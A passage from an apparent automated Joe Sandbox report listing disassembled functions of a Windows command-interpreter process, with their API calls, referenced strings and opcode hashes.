                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: [...]$ [..]$ [.]$...$:
                                                                            • API String ID: 0-1980097535
                                                                            • Opcode ID: e4c3c85fb088ed8c4d750c6d37b6d94f2ef017a205041ff53cf9c1308709af90
                                                                            • Instruction ID: 67729fb58817ddc91c8edbd55e75319e5859c1b1a554a22880516a4eaa01db44
                                                                            • Opcode Fuzzy Hash: e4c3c85fb088ed8c4d750c6d37b6d94f2ef017a205041ff53cf9c1308709af90
                                                                            • Instruction Fuzzy Hash: 06129EB02083419BD725DB24D885AAFBBE9FF88340F4049ADF589C7291EF34D985CB52
                                                                            Function 00B06854 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 366timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00B2E590,?,00002000), ref: 00B06896
                                                                            • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B068AA
                                                                            • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00B068BE
                                                                            • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B068D2
                                                                            • realloc.MSVCRT ref: 00B1A5E7
                                                                              • Part of subcall function 00B08791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00B06906,0000001F,?,00000080), ref: 00B08791
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00B06907
                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 00B0698F
                                                                            • memmove.MSVCRT(?,?,?), ref: 00B06A86
                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00B06AAF
                                                                            • realloc.MSVCRT ref: 00B06ACA
                                                                            • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00B06AFE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                                            • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                            • API String ID: 2927284792-4023967598
                                                                            • Opcode ID: 0cbff3dfee767de93bc151565254911f5ce82d74a0d215a1f15011eff3d8e42f
                                                                            • Instruction ID: 0ebcb6e92d083db986efea75ffd9233b8741d42027e4967f88d920dc3ca8c370
                                                                            • Opcode Fuzzy Hash: 0cbff3dfee767de93bc151565254911f5ce82d74a0d215a1f15011eff3d8e42f
                                                                            • Instruction Fuzzy Hash: 9AC1D871A01225DFDB24DF64CC49AEF77F9EB49300F5440E9E909E7290EA31AE85CB51
                                                                            Function 00B14EC1 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 395fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B14F03
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 00B14F67
                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 00B14F77
                                                                            • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00B02670,?,?,?,-00000001), ref: 00B14FEB
                                                                            • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 00B15103
                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00B1511E
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00B15141
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstmemset$Next
                                                                            • String ID: \\?\
                                                                            • API String ID: 3059144641-4282027825
                                                                            • Opcode ID: d359f3120f24e7016bd6f7931f636282b70b91bd146a9264bd94f702b44de939
                                                                            • Instruction ID: f5612cbed2fe06c62e54c50297733eba31b7781025e1f9d8b18c580b232d77c5
                                                                            • Opcode Fuzzy Hash: d359f3120f24e7016bd6f7931f636282b70b91bd146a9264bd94f702b44de939
                                                                            • Instruction Fuzzy Hash: F9E19171A00115DBDB34EBA4DC89BFA77F9EB54304F9404E9E909A7282EB319E85CB50
                                                                            Function 00B0532E Relevance: 19.8, APIs: 13, Instructions: 272COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000002), ref: 00B0539C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 305f8eec8d048280fe0ede229d3211b709236b4b0e4e3187258e8760ad642630
                                                                            • Instruction ID: 33b9a81267cb08c973556845cef29a41ba4dc300037f4c13c208f9b4f5cc9092
                                                                            • Opcode Fuzzy Hash: 305f8eec8d048280fe0ede229d3211b709236b4b0e4e3187258e8760ad642630
                                                                            • Instruction Fuzzy Hash: 67A1F0759002468BDB389F64D8A56EEB7F5EF64300F9444EDD94AE3280EB319EC2CB14
                                                                            Function 00B2769E Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(F330BDDA,00000000,?), ref: 00B27710
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B27722
                                                                              • Part of subcall function 00B0EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B2E590,00002000,?,00B48BF0,00000000,?,?,00B08F0D), ref: 00B0EC51
                                                                            • towupper.MSVCRT ref: 00B278BC
                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00B279F1
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00B01F8C,00B03B98), ref: 00B27B15
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,F330BDDA,00000000,?), ref: 00B27D0D
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B27D20
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                                                            • String ID: %s $%s>$PROMPT$Unknown
                                                                            • API String ID: 708651206-3050974680
                                                                            • Opcode ID: 1f80ae506e41caaeb9b327181518f5f336223f97a966b33aa51928067e553dfb
                                                                            • Instruction ID: f82c364a20a9289921688ad3a0bb65fa732bb7cb109621c467522b0801763213
                                                                            • Opcode Fuzzy Hash: 1f80ae506e41caaeb9b327181518f5f336223f97a966b33aa51928067e553dfb
                                                                            • Instruction Fuzzy Hash: C0020579A051259BCB24DF28DC496BAB7F5EF45700F1481EAE40DE7290EF305E81DB58
                                                                            Function 00B2C1FA Relevance: 19.7, APIs: 13, Instructions: 179filememorynativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B2C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 00B2C14E
                                                                              • Part of subcall function 00B2C135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 00B2C16A
                                                                              • Part of subcall function 00B2C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 00B2C17B
                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 00B2C24F
                                                                            • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 00B2C270
                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 00B2C293
                                                                            • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00B2C2AE
                                                                            • memset.MSVCRT ref: 00B2C2EF
                                                                            • memcpy.MSVCRT(?,?,?), ref: 00B2C324
                                                                            • memcpy.MSVCRT(?,00000000,?), ref: 00B2C370
                                                                            • NtFsControlFile.NTDLL ref: 00B2C392
                                                                            • RtlNtStatusToDosError.NTDLL ref: 00B2C39D
                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B2C3A4
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00B2C3B6
                                                                            • RtlFreeHeap.NTDLL ref: 00B2C3D1
                                                                            • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B2C3E2
                                                                              • Part of subcall function 00B2C5F2: memset.MSVCRT ref: 00B2C62E
                                                                              • Part of subcall function 00B2C5F2: memset.MSVCRT ref: 00B2C656
                                                                              • Part of subcall function 00B2C5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00B2C6C7
                                                                              • Part of subcall function 00B2C5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00B2C6E6
                                                                              • Part of subcall function 00B2C5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00B2C72A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                                            • String ID:
                                                                            • API String ID: 223857506-0
                                                                            • Opcode ID: bbb798496c31762c4a73f74a659cd15a95f992ce11da1260b08393c45f53a70a
                                                                            • Instruction ID: de4d9e3c45e6d4ead007143df5d7f4d3303fb17c09c8fe32680962f8220e7633
                                                                            • Opcode Fuzzy Hash: bbb798496c31762c4a73f74a659cd15a95f992ce11da1260b08393c45f53a70a
                                                                            • Instruction Fuzzy Hash: 83519F75900214ABDB14DFB4EC45ABEBBF8EF48304B1485AAE806E7251EB34DE01C7A5
                                                                            Function 00B09310 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 249timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00B2E590,?,00002000), ref: 00B09342
                                                                            • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B09356
                                                                            • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00B0936A
                                                                            • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00B0937E
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 00B1BC07
                                                                            • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 00B1BD31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$System$FormatInfoLocalLocale
                                                                            • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                                            • API String ID: 55602301-2516506544
                                                                            • Opcode ID: 412a85822870c9b1d3bfbee6c6114817537f34c693f8c03003ea5864daf6fb6c
                                                                            • Instruction ID: 1ed330df688284334f9c50124ec5a5ba94669f09ce592654ab3ab0e206a241ce
                                                                            • Opcode Fuzzy Hash: 412a85822870c9b1d3bfbee6c6114817537f34c693f8c03003ea5864daf6fb6c
                                                                            • Instruction Fuzzy Hash: E181A576A002199ACF249F648C85EFEB7F9EF44700F9541EAE44AE7190EB315EC5CB90
                                                                            Function 00B1589A Relevance: 15.1, APIs: 10, Instructions: 106memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00B159D0,?,00B06054,-00001038,00000000,?,?), ref: 00B158BB
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B158CD
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B15944
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B1594B
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B1596C
                                                                            • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B15973
                                                                            • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B1598F
                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B159B6
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B2160B
                                                                            • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B21618
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                            • String ID:
                                                                            • API String ID: 3609286125-0
                                                                            • Opcode ID: 626c793001e2b3f152b4090b47c63e611e3eefa64d8f50892f476d0647046bae
                                                                            • Instruction ID: b128baa1e12b290cc0c379a6d5f3420d6356270a615466268181ef3b741e573c
                                                                            • Opcode Fuzzy Hash: 626c793001e2b3f152b4090b47c63e611e3eefa64d8f50892f476d0647046bae
                                                                            • Instruction Fuzzy Hash: 0931BF35241600EFDB209F64DC48AAE3BE5FB86365FB08558E996C32E0DB319D81DB12
                                                                            Function 00B14759 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL(?,?,00000000,?), ref: 00B14782
                                                                            • NtOpenFile.NTDLL ref: 00B147D4
                                                                            • RtlReleaseRelativeName.NTDLL ref: 00B147E0
                                                                            • RtlFreeUnicodeString.NTDLL(?), ref: 00B147EA
                                                                              • Part of subcall function 00B14823: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 00B1484F
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 00B1480E
                                                                            • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000001), ref: 00B2096F
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B2097D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                            • String ID: @
                                                                            • API String ID: 2968197161-2766056989
                                                                            • Opcode ID: cf61415c48c384da38039979106c961f333bc356a04ec5b767b05d53285f529c
                                                                            • Instruction ID: 89b24be448ad9dd18ec342113a68715edeb5899d68769ff92e0b4dcd36f5ad8a
                                                                            • Opcode Fuzzy Hash: cf61415c48c384da38039979106c961f333bc356a04ec5b767b05d53285f529c
                                                                            • Instruction Fuzzy Hash: 41215E75D00219AFDB10DFA5E888AEEBBFCFB49710F104165E906F3251DB709E458B61
                                                                            Function 00B27460 Relevance: 13.6, APIs: 9, Instructions: 66filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B27483
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B27495
                                                                            • fprintf.MSVCRT ref: 00B274BB
                                                                            • fflush.MSVCRT ref: 00B274C9
                                                                            • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B274E2
                                                                            • NtCancelSynchronousIoFile.NTDLL ref: 00B274F8
                                                                            • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B274FF
                                                                            • _get_osfhandle.MSVCRT ref: 00B2751C
                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00B27524
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                            • String ID:
                                                                            • API String ID: 3139166086-0
                                                                            • Opcode ID: e2bc502ccdc98a75504c3f41e52f572df3341c0a18cdd9d2785262b7743e2c58
                                                                            • Instruction ID: 576117bd6cc44c0c9527dd27bcd1581160dbf92c4761743030a8fd0078b5ef60
                                                                            • Opcode Fuzzy Hash: e2bc502ccdc98a75504c3f41e52f572df3341c0a18cdd9d2785262b7743e2c58
                                                                            • Instruction Fuzzy Hash: 0D110831184220AFEB112F64FC0EB6E7BA8FB16715F104059F505931F1DFB48A41DB6A
                                                                            Function 00B14875 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 376COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B11D90: _wcsnicmp.MSVCRT ref: 00B11E14
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                              • Part of subcall function 00B14BAF: _wcsnicmp.MSVCRT ref: 00B14C1A
                                                                              • Part of subcall function 00B14BAF: _wcsnicmp.MSVCRT ref: 00B20B39
                                                                            • memset.MSVCRT ref: 00B14975
                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00B14ABC
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B14AF4
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B14AFF
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 00B14B28
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                            • String ID: COPYCMD
                                                                            • API String ID: 1068965577-3727491224
                                                                            • Opcode ID: edf098d6f2ff5684d703330b5952d21b4e82e1fa4db9efc8800505b60a85288c
                                                                            • Instruction ID: e2ef976a39bf7677cb1f3e62479ce72e838d8681fe5dd35437f7fba72f213a58
                                                                            • Opcode Fuzzy Hash: edf098d6f2ff5684d703330b5952d21b4e82e1fa4db9efc8800505b60a85288c
                                                                            • Instruction Fuzzy Hash: 95D1D635A102159BCB28EF68D895ABBB3F1EF58300F9545E9D80AD7295EB30ED81CB50
                                                                            Function 00B04E3B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _setjmp3.MSVCRT ref: 00B04E78
                                                                              • Part of subcall function 00B08E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B48BF0,00000000,?), ref: 00B08EC3
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • NtQueryInformationProcess.NTDLL ref: 00B04F28
                                                                            • NtSetInformationProcess.NTDLL ref: 00B04F46
                                                                            • NtSetInformationProcess.NTDLL ref: 00B04FAE
                                                                            • longjmp.MSVCRT(00B40A30,00000001,00000000), ref: 00B191C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
